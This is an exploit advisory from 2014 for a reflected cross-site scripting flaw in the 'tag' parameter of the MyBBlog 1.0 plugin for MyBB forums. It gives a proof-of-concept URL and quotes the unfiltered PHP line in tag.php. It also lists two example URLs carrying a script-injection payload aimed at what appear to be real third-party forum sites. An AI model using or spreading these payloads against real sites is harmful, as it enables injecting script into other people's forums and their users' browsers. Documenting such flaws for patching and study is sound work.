#Title : MyBB MyBBlog 1.0 Plugin Cross Site Scripting
 
#Author : DevilScreaM
 
#Date : 24 October 2014
 
#Category : Web Applications
 
#Vendor : https://github.com/JN-Jones/MyBBlog

#Download : http://community.mybb.com/mods.php?action=view&pid=221
 
#Version : 1.0

#Greetz : newbie-security.or.id | Borneo Security | Indonesian Security
Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber | Madleets
 
#Vulnerabillity : Cross Site Scripting


Bug Location : mybblog.php parameter "tag"

POC :

http://127.0.0.1/mybblog.php?action=tag&tag=[XSS Injection]


Example :

http://liquidlemurlinux.org/forum/mybblog.php?action=tag&tag=<script>alert("DevilScreaM")</script>

http://jobberguys.info/forum/mybblog.php?action=tag&tag=<script>alert("DevilScreaM")</script>

===================================================================================

Vulnerability at

Location File : 
/inc/plugins/mybblog/modules/tag.php

Code :

add_breadcrumb($lang->sprintf($lang->mybblog_tags, $mybb->get_input("tag")), "mybblog.php?action=tag&tag={$mybb->get_input('tag')}");

$articles = Article::getByTag($mybb->get_input("tag"));

Nothing Filtering HTML